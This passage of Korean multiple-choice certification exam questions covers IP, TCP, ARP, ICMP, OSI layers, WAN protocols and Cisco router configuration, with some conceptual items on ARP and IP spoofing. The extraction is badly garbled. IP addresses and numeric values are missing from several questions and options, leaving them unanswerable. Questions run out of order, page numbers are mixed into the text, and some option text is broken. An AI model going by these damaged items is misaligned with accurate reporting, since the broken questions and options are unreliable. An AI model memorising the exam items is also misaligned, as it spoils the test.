데이터그램을 분할한다. 2 DF 0 : 라우터나 호스트가 IP 데이터그램을 분할할 수 있다. 3 MF 1 : 분할된 패킷의 경우 수신자 측에서 보면 들어올 단편( Fragment)가 더 있다는 의미이다. 4 MF 0 : 마지막 프레임이라는 의미이다. 38. TTL(Time To Live)필드는 데이터그램이 네트워크에 머물 수 있는 최대 시간이다. 이 TTL 값이 0 이 되면 라우터에서 데이터그램을 폐기한다. 다음 TTL필드에 대한 설명 중 잘못된 것은? 1 TCP 세그먼트 수명을 제한한다. 2 인터넷 경로설정 루프를 종료한다. 3 최대값은 255 이다. 4 ICMP 메시지를 통해 TTL 타이머 만료시간을 수신 지로 알린다. 137
138 39. Fragment Offset 필드는 원본 데이터그램을 전송 과정 중 그 분할 데이터가 어디에 있는지 위치를 표시 한다. Fragment Offset 필드에 대한 설명 중 옳지 않 은 것은? 1 0 : fragment되지 않는 데이터그램과 fragment된 경우 선두의 데이터그램을 뜻한다. 2 마지막 fragment를 제외한 모든 fragment는 8byte 의 배수이다. 3 IP 데이터그램의 최대 크기는 65536이며 최대 8192개 조각으로 데이터를 분할할 수 있다. 4 수신 IP 노드는 마지막 IP fragment를 수신했을 때 재조립 타이머를 시작한다. 40. 장비가 패킷을 보내고자 하는 곳의 IP 주소는 알 고 있지만 이더넷 주소를 모를 경우, 이더넷 주소를 알기 위해 사용하는 프로토콜은 다음 중 무엇인가? 1 IP(Internet Protocol) 2 ARP(Address Resolution Protocol) 3 RARP(Reverse Address Resolution Protocol) 4 IARP(Inverse Address Resolution Protocol) 41. 비정상적인 IP 패킷은 정상적인 패킷 생성과정에 서는 만들어질 수 없는 패킷으로서, 공격의 도구로 이 용될 수 있으므로 침입차단 및 침입탐지 시스템에서 검사해야 할 패킷이라 할 수 있다. 다음 Spoofed IP 패킷을 설명한 것으로 사실과 다른 것은? 1 외부에서 들어온 패킷의 소스 IP주소가 Local Network의 주소를 가지고 있다. 2 Next-hop Router 혹은 직접 접속된 네트워크의 IP 주소를 가지고 있다. 3 소스 IP 주소와 목적지 IP 주소가 동일하다. 4 외부에서 들어온 패킷의 소스 IP 주소가 Broadcasting address를 가지고 있다. 42. Fragmentation IP 패킷이란 원래의 패킷 크기를 지원할 수 없는 네트워크 매체를 통해 전송할 때 패킷 을 작은 단위로 분해하는 것을 의미한다. 정상적인 Fragmentation IP 패킷을 설명한 것 중 틀린 것을 모 두 고르면? 1 TCP header가 fragment된 경우 2 UDP, ICMP, IGMP 트래픽들이 fragment된 경우 3 모든 fragment의 최대 크기가 65,535bytes를 넘지 않은 경우 4 마지막 fragment를 제외한 나머지 fragment의 크 기가 8의 배수인 경우 43. 하드웨어 주소와 IP 주소를 연계시키는데 필요한 프로토콜을 ARP(Address Resolution Protocol)라고 한 다. 다음 ARP 동작 원리를 설명한 것 중 내용이 맞지 않은 것은? 1 ARP모듈은 ARP요청을 보내기 전에 ARP 캐시 테이 블에서 목적지 하드웨어주소를 검사 2 호스트는 ARP요청 프레임을 보내고 이를 수신하는 모든 다른 노드는 그 IP주소를 프레임의 IP주소와 비교 3 ARP Request Frame에 요청한 것과 같은 IP주소를 가진 호스트만 응답 4 호스트는 ARP응답에 포함된 대답으로 MAC Table 을 초기화 44. ICMP(Internet Control Message Protocol)는 IP 계 층에서 오류보고 및 제어를 목적으로 만들어진 프로토 콜이다. 다음 ICMP 서비스 설명 중 옳지 않은 것은? 1 ECHO : IP 노드의 신뢰성을 결정하기 위한 진단 도구로 사용 2 Destination Unreachable : 목적지 IP 노드에 도달 하지 않았다는 것을 나타내기 위해 사용 3 Source Quench : IP 데이터그램의 문제를 나타내 기 위해 사용 4 Address Mask : 네트워크의 서브넷 마스크 정보 습득을 위해 사용 45. 다음 ICMP Message에 대한 설명 중 옳지 않은 것은? 1 Host Unreachable : 첫 번째 라우터가 호스트와 통 신할 수 없을 때 2 Protocol Unreachable : IP 헤더의 프로토콜필드로 식별된 상위 프로토콜을 사용할 수 없음 3 Fragmentation needed for DF=1:네트워크 인터페 이스의 MTU크기보다 데이터그램이 커서 전달할 수 없을 때 4 Host Precedence Violation : 호스트 우선권 위반 (송신자 호스트에 대한 첫 번째 홉 라우터에서 생 성) 46. 이 프로그램은 ICMP Request 메시지를 특정 호스 트에 송신하여, 이에 대한 ICMP Reply를 수신함으로써 호스트의 활성화 여부를 검사해 보고, 요청과 응답에 대한 경과 시간 RTT(Round-Trip-Time)을 알아볼 때 사 용한다. 이것은 어떤 프로그램인가? 1 TTL(Time To Live) 2 Time Exceeded 3 Host Unreachable 4 PING 138
139 47. TCP Segment Format 필드 중에 수신측의 호스트 에서 프로세스나 서비스를 식별하는 주소 역할을 하 고, TCP는 이 포트 번호로 지정된 데이터의 출구에 수 신한 데이터를 순서에 맞춰 흘려보낸다. 서버들은 일 반적으로 1 ~ 1023 사이의 포트 넘버를 가진다. 이 필드를 무엇이라 하는가? 1 Sequence Number & ACK 필드(32bit + 32bit) 2 Window 필드(16bit) 3 Source Port 필드(16bit) 4 Destination Port 필드(16bit) 48. TCP 헤더와 데이터를 포함하여 TCP 세그먼트 전 체에 대한 오류를 검사하는데 사용되며 16bit 단위로 "1"의 보수의 합을 계산한다. 96bit 가상 헤더가 필드 계산을 위해 TCP 헤더에 배정되어 있다. 위에서 설명 한 내용은 TCP 필드 중 어떤 필드에 대한 설명인가? 1 Window 필드 2 Control Flags 필드 3 Checksum 필드 4 Data Offset 필드 49. IP fragment는 패킷이 여러 네트워크를 거쳐서 전 송될 때 발생되는 정상적인 동작 형태이다. 아래는 원 래 datagram과 fragment가 일어난 상태를 나타낸 것 이다. 이에 대한 설명으로 옳지 않은 것은? [원래의 datagram] [fragment 1] [fragment 2] Identification = Identification = Identification = Total length = 500 Total length = 276 Total length = 224 Fragment Offset = 0 Fragment Offset = 0 Fragment Offset = 32 more Data Flag = False more Data Flag = True more Data Flag = False 1 위와 같이 fragment가 나뉘게 되는 경우는 MTU가 280인 네트워크를 경유하게 될 때 생길 수 있다. 2 패킷이 전송될 때 서로 다른 MTU를 가지는 여러 개의 네트워크를 거치게 되는 경우 제일 작은 MTU가 전송을 위한 MTU로 결정된다. 3 패킷 offset이나 flag 등을 조작하여 전달 전송하는 경우에 수신측에서 fragment를 조합하며 조합이 완료되기 전이라도 일정시간 지난 이후엔 대기큐 에서 제거된다. 4 fragment2에서 fragment offset은 8의 배수로 설정 이 되며, Total length는 IP 헤더와 데이터 값을 합 친 값이다. 50. 네트워크 통신 시 이더넷에서는 MAC주소를 브로 드캐스팅 하여 정보를 주고받기 때문에 두 개의 피어 (peer) 간에 MAC주소를 변조하여 해당 세션을 끊거나 세션을 중간에 가로채는 것이 가능하다. 아래는 시스 템 상의 ARP table을 보여주고 있다. 이에 대한 설명 으로 옳지 않은 것은? [초기 ARP] #arp -v Address HWtype HWaddress Flag Mask Iface ether 00:C0:26:65:93:5C C eth1 linux.sis.net ether 00:C0:9F:03:AD:11 C eth0 Entries : 2 Skipped : 0 [일정 시간 후 ARP] #arp -v Address HWtype HWaddress Flag Mask Iface ether aa:aa:aa:aa:aa:aa C eth1 linux.sis.net ether 00:C0:9F:03:AD:11 C eth0 Entries : 2 Skipped : 의 MAC주소가 aa:aa:aa:aa:aa:aa로 변조 된 것으로 보아 다시 올바른 MAC 주소로 갱신되 기 전까지는 해당 호스트와 통신을 할 수 없다. 2 이더넷 환경에서 네트워크는 데이터의 수신을 위하 여 자신이 가지는 MAC주소를 일정시간 간격을 가 지고 브로드캐스팅을 하게 되므로 MAC address Spoofing이 발생할 수 있다. 3 이더넷 환경에서 MAC주소가 변경되어도 IP 주소가 바뀌지 않았기 때문에 통신하는 데에는 문제가 발 생하지 않는다. 4 MAC address Spoofing을 막기 위해서 시스템이 가지는 IP주소와 MAC주소를 관리자가 Static하게 넣어주면 ARP 테이블이 Dynamic하게 갱신 (Update)되는 것을 막을 수 있다. 51. ARP cache는 ARP의 효과적인 운영을 위해 호스트 는 ARP cache를 유지, 운영하게 되는데 이 cache는 최근에 매핑된 IP와 하드웨어 주소를 관리하여 주며 일정시간이 지나면 cache 내의 내용이 소멸된다. 이때 ARP cache poisoning, ARP spoofing이 일어날 수 있 는데 이를 방지할 수 있는 방법으로 옳지 않은 것은? 1 cache entry의 존속 시간을 줄인다. 2 dynamic ARP address를 생성하게 한다. 3 시스템 인터페이스에서 ARP processing의 기능을 비활성화 시킨다. 4 ARP 트래픽을 모니터링 하여 MAC/IP 매칭을 감시 하는 프로그램을 설치하여 지속적으로 확인한다. 139
140 52. 단말 시스템 간에 물리적 링크를 가동, 유지, 절단 등 전기적, 기계적, 기능적 절차를 정의하는 계층은? 1 물리 계층 2 데이터링크계층 3 네트워크 계층 4 트랜스포트 계층 53. MAC(Media Access Control) Address를 이용하여 호스트에서 다른 호스트로, 또는 라우터 간에 패킷을 전송하며 메시지를 데이터 프레임 형식으로 만드는 계 층은? 1 물리 계층 2 데이터링크 계층 3 네트워크 계층 4 트랜스포트 계층 58. 정보를 교환하고 통신하기 위해 각 레이어는 PDU(Protocol Data Unit)를 사용한다. OSI 참조 모델 의 Network layer에서 사용하는 PDU를 무엇이라 하는 가? 1 세그먼트(Segments) 2 패킷(Packet) 3 프레임(Frame) 4 비트(Bit) 59. 트랜스포트 계층(Transport layer)은 상위 계층으로 부터 데이터 수신하고 이를 일정한 크기로 분리하여 캡슐화 한다. 이때 생성되는 PDU(Protocol Data Unit) 를 무엇이라 하는가? 54. 호스트 간에 신뢰성 있는 서비스를 제공하기 위해 논리적 연결을 수행하는 계층은? 1 세그먼트(Segment) 3 프레임(Frame) 2 패킷(Packet) 4 비트(Bit) 1 어플리케이션 계층(Application layer) 2 프리젠테이션 계층(Presentation layer) 3 세션 계층(Session layer) 4 트랜스포트 계층(Transport layer) 55. 데이터를 표준 포맷으로 교환하고, 정확히 데이터 를 전송하며 데이터의 압축과 복원, 암호화와 복호화 등을 수행하는 계층은? 1 어플리케이션 계층(Application layer) 2 프리젠테이션 계층(Presentation layer) 3 세션 계층(Session layer) 4 트랜스포트 계층(Transport layer) 56. MAC(Media Access Control) Address를 정의하는 표준 Format은 몇 비트인가? 1 8bit 2 16bit 3 32bit 4 48bit 57. 호스트가 네트워크를 통하여 다른 장비로 데이터 를 전송할 때 프로토콜 정보와 함께 데이터가 캡슐화 (Encapsulation)된다고 정의한다. 다음 OSI 참조 모델 각 계층에서 캡슐화 순서대로 정렬한 것 중 맞는 것 은? 1 Bit Frame Packet Segment 2 Packet Frame Bit Segment 3 Segment Packet Bit Frame 4 Segment Packet Frame Bit 60. LAN(Local Area Network) Switching 방식 중 대기 시간이 가장 길며 모든 프레임에 대하여 CRC(Cyclical Redundancy Check) Error Check를 수행하는 것은? 1 Cut-through 2 tore-and-forward 3 Fragment Check 4 Fragment Free 61. 하드웨어 주소만 검사 후 프레임을 Forwarding하 는 방식은? 1 Cut-through 2 tore-and-forward 3 Fragment Check 4 Fragment Free 62. BPDU(Bridge Protocol Data Unit)에 대한 설명 중 올바른 것은? 1 IP 패킷을 이용하여 환경설정 메시지를 전송한다. 2 멀티캐스트 프레임을 이용하여 환경설정 메시지를 전송한다. 3 STP(Spanning Tree Protocol) 링크의 비용을 설정 하는데 이용한다. 4 스위치의 브릿지 ID를 설정하는데 이용한다. 63. 다음 보기와 같이 스위치가 포트 변경을 결정할 경우 해당 포트의 상태는? (보기 : Blocked port에서 designated port로 전환) 1 Forwarding 2 Listening 3 Learning 4 Unblocked 140
141 64. VLAN(Virtual LAN)구성은 여러 장치들이 마치 하 나의 네트워크에 연결된 것처럼 구성하는 것이다. 다 음 설명 중 올바르지 않은 것은? 1 분산된 스위치들을 하나의 브로드캐스트 도메인으 로 정의한다. 2 서로 다른 VLAN 그룹 간에는 라우터를 통해 통신 을 할 수 있다. 3 논리적으로 다른 네트워크에 있는 호스트를 같은 네트워크로 구성하는 것을 의미한다. 4 다른 네트워크에 있는 호스트를 물리적으로 같은 네트워크로 구성하는 것을 의미한다. 65. IP Packet의 최대크기는 얼마인가? 1 1,024bytes 2 2,048bytes 3 32,768bytes 4 65,536bytes 69. UDP(User Datagram Protocol)는 비 연결형 (Connection less) 프로토콜로 데이터 전송에서는 신뢰 성이 낮지만 네트워크에서 대역폭을 많이 차지하지 않 으며 정보전송이 TCP에 비해 빠른 편이다. 다음 UDP 의 특징을 설명한 것 중 옳지 않은 것은? 1 순차적 전송 2 신뢰성이 낮음 3 비 연결형 4 오버헤드가 적음 70. RFC792에 정의되어 있으며 주로 라우터가 보내는 IP 계층상의 네트워크 정보나 에러 상황을 메시지 형 태로 발신지에 전하여주는 프로토콜은 무엇인가? 1 IP(Internet Protocol) 2 ICMP(Internet Control Message Protocol) 3 RARP(Reverse Address Resolution Protocol) 4 ARP(Address Resolution Protocol) 66. DHCP(Dynamic Host Configuration Protocol)는 호 스트에 IP 어드레스를 부여하여 네트워크 관리를 용이 하게 한다. 다음 DHCP 서버가 제공하는 것 중 틀린 것은? 1 IP Address 2 Subnet Mask 3 Default Gateway 4 Metric 71. 로컬 네트워크에서 호스트의 하드웨어 어드레스를 찾는데 사용되는 프로토콜은 무엇인가? 1 IP(Internet Protocol) 2 ICMP(Internet Control Message Protocol) 3 TCP(Transport Control Protocol) 4 ARP(Address Resolution Protocol) 67. 연결지향형(Connection-Oriented) 접속으로 전송된 패킷에 대하여 신뢰성을 제공하며 에러체크를 통해 헤 더와 데이터 필드들을 점검하는 프로토콜은? 1 IP(Internet Protocol) 2 TCP(Transport Control Protocol) 3 UDP(User Datagram Protocol) 4 ARP(Address Resolution Protocol) 68. 다음 TCP Segment Format에 대한 설명 중 올바 르지 않은 것은? 1 Source port는 데이터를 전송하는 발신지 호스트의 포트 번호이다. 2 Destination port는 수신지 호스트에서 요청된 어플 리케이션 포트 번호이다. 3 Cyclic Redundancy Check는 헤더와 데이터 필드들 을 체크한다. 4 Data는 네트워크 레이어에서 TCP 프로토콜로 전달 된다. 72. 다음 프로토콜 중 상위 레이어의 프로토콜이 출발 지와 수신지 노드 간에 데이터 송 수신을 보장하며 연결 지향적인 서비스를 제공하는 프로토콜은? 1 RIP(Routing Information Protocol) 2 NCP(Netware Core Protocol) 3 SAP(Service Advertising Protocol) 4 SPX(Sequenced Packet Exchange) 73. PPP(Point-to-Point Protocol)는 동기식 또는 비동 기식 회선을 통해 라우터-라우터 연결이나 호스트-네 트워크 연결 방식을 지원한다. 또한 PPP는 IP, IPX, ARA등과 같은 여러 네트워크 레이어 프로토콜과 함께 사용하도록 설계되었고 CHAP 또는 PAP를 통해서 사 용자 인증을 지원한다. 다음 PPP에서 라우터-라우터 간 연결이나 호스트-네트워크 간 연결을 제어하기 위 해 사용하는 프로토콜을 모두 고르시오. 1 HDLC(High-level Data Link Control) 2 LAPB(Link Access Procedure Balanced) 3 NCP(Network Control Protocol) 4 LCP(Link Control Protocol) 141
142 74. PPP(Point-to-Point Protocol)에서 LCP(Link Control Protocol)는 데이터링크 연결을 만들고, 설정하고, 테스 팅하는 기능을 가진다. 만약 LCP가 연결을 끊게 되면 어떤 현상이 발생하는가? 1 새로운 연결이 만들어진다. 2 NCP가 링크 유지 프레임을 보낸다. 3 연결 세션을 다시 연다. 4 LCP가 네트워크 계층 프로토콜에 알린다. 75. 다음 중 기본적인 프레임 릴레이 규격을 확장한 LMI(Local Management Interface)가 제공하는 정보가 아닌 것은? 1 가상 회선의 동작 상태를 메시지 형태로 라우터에 알려준다. 2 네트워크와 사용자 장치 간의 동기와 통신을 제공 한다. 3 네트워크 서버에 로컬 DLCI와 멀티캐스트 DLCI를 제공한다. 4 데이터링크 설정을 위한 제어 기능 및 IP 주소를 자동 할당하는 기능을 제공한다. 76. 데이터 링크 레이어의 LLC 서브레이어에서 동작하 며 여러 개의 네트워크 레이어 프로토콜이 PPP와 함 께 사용될 수 있도록 지원하는 것은? 1 SDLC(Synchronous Data Link Control) 2 HDLC(High level Data Link Control) 3 NCP(Network Control Protocol) 4 LCP(Link Control Protocol) 77. Frame Relay 네트워크에서 PVC(Permanent Virtual Circuit)를 식별하는 방법은 무엇인가? 1 LCP(Link Control Protocol) 2 NCP(Network Control Protocol) 3 HDLC(High level Data Link Control) 4 DLCI(Data Link Connection Identifier) 78. 다음 중 Frame Relay 네트워크에서 트래픽 폭주를 제어하기 위해 사용하는 것은? 1 DLCI(Data Link Connection Identifier) 2 LMI(Local Management Interface) 3 NCP(Network Control Protocol) 4 BECN(Backward Explicit Congestion Notification) 79. 모든 IP 네트워크 장비들은 그들만의 고유한 IP Address와 Subnet Mask를 가지고 있다. Subnet Mask 의 목적을 설명한 것 중 맞는 것은? 1 IP Address의 호스트 부분을 지정하기 위한 것이 다. 2 호스트 영역의 비트를 가지고 서브넷 영역으로 사 용하기 위한 것이다. 3 IP Address의 네트워크 부분만을 지정하기 위한 것 이다. 4 기본적으로 서브넷 영역과 호스트 영역은 정해져 있으며 주어진 영역만 사용한다. 80. IP address 이고 Subnet Mask 이다. 여기에 속하는 네트워크 어드레 스는? TCP와 UDP는 상위 레이어와 통신하게 위해 포트 번호를 사용한다. 다음 송신하는 호스트가 다른 호스 트와 연결을 설정하고 유지하는데 사용할 수 있는 포 트 번호의 범위는? 1 1 ~ ~ ~ 65, ~ 65, TCP/IP에 대한 설명으로 바르지 않은 것은? 1 ICMP는 호스트나 라우터의 오류상태에 대한 정보 를 메시지 형태로 제공한다. 2 IP는 주소지정, 서비스타입규격, 분해와 합성 등의 기능을 수행한다. 3 ARP는 데이터 전송의 목적지에 대한 물리적 주소 를 획득하는 역할을 담당한다. 4 OSPF는 파일의 전송이 제대로 이루어지게 하는 역 할을 담당한다. 83. 웹서버들의 응답 속도 향상을 위하여 사용하는 웹 스위치(Layer 4 Switch)에 대한 취약성 점검을 하고자 한다. 이에 대한 것으로 적절치 않은 것은? 1 웹스위치를 웹 상에서 관리하기 위한 웹 서버의 실 행 여부 2 접근제어리스트(ACL)의 설정 여부 3 웹스위치에 연결되어 동일하게 작동하는 웹 서버의 대수 4 웹스위치 관리를 위한 별도의 IP 설정 여부 142
143 84. 다음 중 PAT(Port Address Translation)에 대한 설 명 중 틀린 것을 고르면? 1 내부 네트워크에서 사용되는 IP 주소에 대한 정보 가 외부로 나가는 것을 막아준다. 2 제한된 공인 IP 주소보다 많은 컴퓨터를 인터넷에 연결할 수 있다. 3 한 개의 IP 주소로 인터넷에 이용할 수 있는 컴퓨 터는 최대 256 대이다. 4 내부 네트워크에서는 사설 IP를 사용하는 것을 원 칙으로 한다. 85. 네트워크 종단 장치인 CSU/DSU에 대한 설명 중 올바른 것은? 1 Unit/Digital 서비스 Unit의 채널 서비스 2 Unit/DUI 서비스 Unit의 채널 서비스 3 Unit/Data 서비스 Unit의 채널 서비스 4 Unit/Digital 스위치 Unit의 채널 서비스 86. 다음 중 라우터의 ACL(접근 제어 목록) 설정에 대 한 옳은 설명은? (Access-list 101 permit udp any eq 53) /24에서 접근하는 모든 네트워크 패킷 에 대한 접근 제어 /24에서 DNS를 이용하여 접근하는 노 드에 대한 허용 설정 을 서버로 사용하여 접근하는 클라이언 트에 대한 접근 허용 4 옳은 답이 없음 87. 다음 IP Standard Access Configuration에 대한 설 명 중 내용과 다른 것은? Router(config)# access-list access-list-number {permit deny} source [wildcard mask] Router(config)# ip access-group access-list-number {in out} 88. 다음의 Access-List 명령문을 보고 각 파라미터에 대한 설명 중 맞지 않은 것은? Router(config)#ip access-list 100 deny tcp any host eq 23 1 목적지의 포트번호가 23 번을 의미한다. 2 이 패킷은 TCP header를 포함하고 있다. 3 IP Standard Access List 이다. 4 출발지 주소는 상관없이 목적지 주소가 인 패킷이다. 89. Router는 입력된 데이터 정보를 Routing Table 정 보에 의해 처리한다. 다음 라우팅 테이블 정보를 설명 한 것 중 올바르지 않은 것은? 1 목적지 IP 주소 정보(host address 및 network address 포함) 2 Next-hop router 및 직접 접속된 네트워크의 IP 주 소 정보 3 라우팅 테이블에 일치되도록 네트워크 인터페이스 내역 및 데이터 순서 재배치 4 전송을 위해 Datagram을 넘겨 줄 네트워크 인터페 이스 내역 90. 라우터에서 다음과 같은 액세스 리스트를 설정하 였다. 본 액세스 리스트의 목적으로 가장 적당한 것 은? Router(config)# access-list 180 permit ip {local network} {local network mask} any Router(config)# access-list 180 deny ip any any Router(config)# interface serial 0 Router(config-if)# ip access-group 180 out 1 서비스 거부 공격에 대한 대책이다. 2 내부자의 IP Spoofing을 방지하기 위한 설정이다. 3 라우터에 대한 외부의 접속을 막기 위한 설정이다. 4 불필요한 서비스(chargen, echo 등)가 외부에 응답 하지 않도록 하기 위한 설정이다. 1 Access-list-number는 선언된 access-list 번호이다. 2 Standard access-list-number는 0 ~ 99 번까지이다. 3 Extended access-list-number는 100 ~ 199 번까지 이다. 4 한 Interface의 in/out에 2개의 access-group은 선 언될 수 없다. 143
144 91. 라우터상에서 발생되는 보안 위협의 요소로는 도 청(Eavesdropping), 세션 재전송(Session Reply), 재라 우팅(Rerouting), 위장(Masquerade) 등 다양한 방법이 있을 수 있다. 용어의 설명이 적절하지 않은 것은? 1 라우터 자체에서 제공되는 서비스 즉, SNMP, finger 등을 통해서도 공격자가 도청을 할 수 있으 며 정보를 수집할 수 있다. 2 세션 재전송 공격은 재전송할 수 있는 패킷이나 어 플리케이션 명령어를 순차적으로 사용하여 비인가 된 행위나 접근을 말하는 것이다. 3 재라우팅 공격은 IP 스푸핑, 일련번호 예측 및 변 경, 그 외 다른 방법들을 이용하여 네트워크 세션 을 가로채는 것을 말한다. 4 위장 공격은 비 인가된 접속 혹은 가짜 데이터를 네트워크에 투입하는 경우에 IP 패킷을 조작하여 근원지 주소(IP)를 거짓으로 조작하는 공격이다. 92. 다중 시스템 구성은 대형 네트워크나 금융망과 같 이 접속량이 많은 망에서 무정지 시스템을 추구하고자 하는 네트워크 구성을 말하는데, 이와 함께 고 가용성 (High Availability) 구현에 대한 설명으로 옳지 않은 것 은? 1 하나 이상의 시스템을 이용한 다중 시스템 구성은 Primary System이 다운되었을 경우 Backup System이 자동으로 가동되어 서비스의 다운시간을 최소화하는 High Availability 구조이다. 2 Load Sharing 구조는 L4 Switch와 연동하여 구현하 는데 Load를 분산시킴으로써 성능 향상을 가져올 수 있고 시스템 장애 시 Backup 역할을 수행한다. 3 Primary/Backup 구조는 Primary 시스템에 문제가 발생될 경우, Backup 시스템이 Primary 시스템의 IP 주소 값으로 변환되게 함으로 사용자들이 불편 을 느끼지 않도록 하며 안정성을 높일 수 있는 구 조이다. 4 Primary/Backup 구조와 Load Sharing 구조에서는 IP address Take over나 ARP Take over 방법을 이 용하여 고 가용성을 구현한다. 93. 특정 인터페이스를 통해 전달되는 라우팅 업데이 트를 제어하는데 사용되는 명령은 무엇인가? 1 Router(config-router)#passive-interface 2 Router(config-router)#passive-interface update 3 Router(config-router)#passive-routing 4 Router(config-router)#passive-route update 94. 라우터 A가 라우터 B로부터 수신한 업데이트 정보 를 다시 라우터 B로 되돌리는 것을 금지시킴으로써 네 트워크에서 라우팅 루프 문제를 해결하는 방법은 무엇 인가? 1 Route Poisoning 2 Split Horizon 3 Hold Down 4 Hop Count 95. 네트워크를 필터링하여 입출력을 통제할 목적으로 라우터에 액세스 리스트를 설정하였다. 다음 보기 중 액세스 리스트를 모니터링 하는 방법으로 잘못된 것 은? 1 sh interface 2 sh run 3 sh ip interface 4 sh access-list 96. 다음 라우터 설정을 바르게 설명한 것을 모두 고 르시오? router(config)#int e0 router(config)#ipx network 10 router(config)#int s1 router(config)#ipx network 20 1 Ethernet 0 인터페이스를 IPX 네트워크 10번에 설정 2 Ethernet 0 인터페이스를 IPX 네트워크 20번에 설정 3 Serial 1 인터페이스를 IPX 네트워크 10번에 설정 4 Serial 1 인터페이스를 IPX 네트워크 20번에 설정 97. router(config)#line console 0 명령으로 설정할 수 있는 것은? 1 Telnet 패스워드를 설정할 수 있다. 2 콘솔 패스워드를 설정할 수 있다. 3 라우터 시리얼 인터페이스를 설정할 수 있다. 4 콘솔 연결 설정을 종료시킨다. 98. 라우터에서 Default route를 설정하는 방법은? ➀ Network와 Mask에 모두 ➁ Network와 Mask에 모두 ➂ 인터넷에 연결된 스위치 포트이다. ➃ Network 와 Mask에 144
145 99. IP Address Subnet Mask 인 호스트의 유효범위는? 부터 까지 부터 까지 부터 까지 부터 까지 104. 현재 운영 중인 라우터 환경설정을 NVRAM에 복 사하고, 라우터가 재 시작될 때 복사된 환경 설정을 Reload하는 명령은 무엇인가? 1 Router(config)#copy run startup 2 Router(config)#copy run config start 3 Router(config)#copy current to startup 4 Router(config)#copy startup to run 100. 다음 중 B 클래스 어드레스를 가진 네트워크에서 기본으로 설정되어 있는 브로드캐스트 어드레스는? C 클래스 어드레스를 할당받은 사업장에서 팀별 로 네트워크를 나누어 사용하려고 한다. 한 팀에 12개 의 서브넷 ID을 원할 경우 이 사업장의 서브넷 마스크 는? 라우터의 환경설정을 성공적으로 수행하고 환경 설정을 확인하려고 한다. 다음 보기 중 현재 구동중인 라우터의 환경설정을 보여주는 것은? 1 show running-config 2 show start-config 3 show history 4 show controllers 106. 인터페이스에 적용된 Access-List들과 관련된 사 항들을 보는 명령어는? 1 show interface 2 show ip interface 3 show access-list 4 show ip access-list 102. 네트워크 관리자가 시스템 환경설정을 위해 라우 터 Setup 모드로 들어가려 한다. 다음 라우터 Setup 모드로 들어가는 두 가지 방법은 무엇인가? 1 clear flash 2 erase start와 Router Rebooting 3 setup mode 4 setup 103. 사용자 모드와 Enable Password를 암호화하려면 패스워드를 세팅하기 전에 먼저 전체 환경 설정을 하 여야한다. 다음 Cisco Router에 Telnet Password를 암 호화하는 명령은 무엇인가? 1 Service password encryption, line vty 0, password todd 2 Service password encryption, line telnet 0, password todd 3 Service password encryption, line vty 0 4, password todd 4 Service password encryption, line telnet 0 4, password todd 107. 아래는 시스코 라우터의 #sh int s0 명령을 실행 시킨 결과이다. 현재 라우터 상태를 잘못 설명한 것 은? #sh int s0 Serial0 is up, line protocol is up MTU 1500 bytes, BW 2048 Kbit, DLY usec, rely 255/255, load 46/255 Encapsulation HDLC, loopback not set, keepalive set (10 sec) Last input 00:00:02, output 00:00:00, output hang never Last clearing of "show interface" counters 00:04:34 Input queue: 0/75/0 (size/max/drops); Total output drops: 0 Queueing strategy: weighted fair Output queue: 0/1000/64/0 (size/max total/threshold/drops) Conversations 0/66/256 (active/max active/max total) Reserved Conversations 0/0 (allocated/max allocated) 5 minute input rate bits/sec, 273 packets/sec 5 minute output rate bits/sec, 408 packets/sec packets input, bytes, 0 no buffer Received 32 broadcasts, 0 runts, 0 giants, 0 throttles 0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort packets output, bytes, 0 underruns 0 output errors, 0 collisions, 0 interface resets 0 output buffer failures, 0 output buffers swapped out 0 carrier transitions DCD=up DSR=up DTR=up RTS=up CTS=up 145
146 1 이더넷 인터페이스에 연결된 사용자들은 인터넷이 상당히 느리다고 느낄 것이다. 2 회선 대역폭은 E1이고 Input Load는 46/255이다. 3 Traffic Full 상태이다. (5 minute input rate bits/sec, 273 packets/sec) 4 관리자는 현재 대역폭(E1)을 증설할 계획을 세워야 할 것으로 생각된다 아래의 내용 상 관리자가 점검하여야 할 내용으 로 보기에 적절하지 않은 것은 무엇인가? Serial1/0 is up, line protocol is up MTU 1500 bytes, BW 2048 Kbit, DLY usec, rely 243/255, load 1/255 Encapsulation HDLC, crc 16, loopback not set, keepalive set (10 sec) Last input 00:00:00, output 00:00:01, output hang never Last clearing of "show interface" counters 00:02:37 Input queue: 0/75/0 (size/max/drops); Total output drops: 0 Queueing strategy: weighted fair Output queue: 0/1000/64/0 (size/max total/threshold/drops) Conversations 0/1/256 (active/max active/max total) Reserved Conversations 0/0 (allocated/max allocated) 5 minute input rate 0 bits/sec, 1 packets/sec 5 minute output rate 0 bits/sec, 0 packets/sec 151 packets input, 7966 bytes, 0 no buffer Received 20 broadcasts, 0 runts, 0 giants, 0 throttles 27 input errors, 27 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort 121 packets output, bytes, 0 underruns 0 output errors, 0 collisions, 0 interface resets 0 output buffer failures, 0 output buffers swapped out 0 carrier transitions DCD=up DSR=up DTR=up RTS=up CTS=up 1 'rely 243/255'는 회선상태를 나타내는 값으로 현재 회선상태를 신뢰할 수 없으므로 사용하고 있는 전 용회선 기간통신 사업자에게 회선 점검을 의뢰한 다. 2 회선 상태가 신뢰할 수 있다면 DCE 장비의 Internal/External Setting을 점검한다. 3 회선과 DCE 장비를 신뢰할 수 있다면 라우터 포트 및 장비 접지 상태를 점검한다. 4 회선과 네트워크 장비가 이상이 없다면 대역폭을 증설하여야 한다 현재 운영 중인 라우터의 DRAM 및 Flash 메모리 용량은 얼마인가? Router#sh ver Cisco Internetwork Operating System Software IOS (tm) 3600 Software (C3640-JS-M), Version 12.0(9), RELEASE SOFTWARE (fc1) Copyright (c) by cisco Systems, Inc. Compiled Wed 26-Jan-00 18:38 by bettyl Image text-base: 0x , data-base: 0x60C04000 ROM: System Bootstrap, Version 11.1(20)AA2, EARLY DEPLOYMENT RELEASE SOFTWARE (fc1) Router uptime is 0 minutes System restarted by power-on System image file is "flash:c3640-js-mz bin" cisco 3640 (R4700) processor (revision 0x00) with 49152K/16384K bytes of memory. Processor board ID R4700 processor, Implementation 33, Revision 1.0 Bridging software. X.25 software, Version SuperLAT software (copyright 1990 by Meridian Technology Corp). TN3270 Emulation software. 1 FastEthernet/IEEE interface(s) 125K bytes of non-volatile configuration memory K bytes of processor board System flash (Read/Write) Configuration register is 0x DRAM : 32M, Flash Memory : 32M 2 DRAM : 64M, Flash Memory : 32M 3 DRAM : 128M, Flash Memory : 32M 4 DRAM : 128M, Flash Memory : 64M 110. 아래의 라우터 메시지를 보고 